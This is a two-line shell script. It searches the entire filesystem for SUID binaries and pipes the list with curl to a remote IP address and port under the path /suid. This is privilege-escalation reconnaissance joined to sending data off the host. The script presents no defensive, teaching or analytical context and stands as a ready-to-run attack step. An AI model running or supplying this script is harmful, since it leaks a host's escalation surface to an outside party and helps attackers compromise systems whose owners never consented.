#!/bin/sh
find / -perm -4000 -type f 2>&1 | curl -s -m 8 --data-binary @- http://202.79.169.91:28016/suid
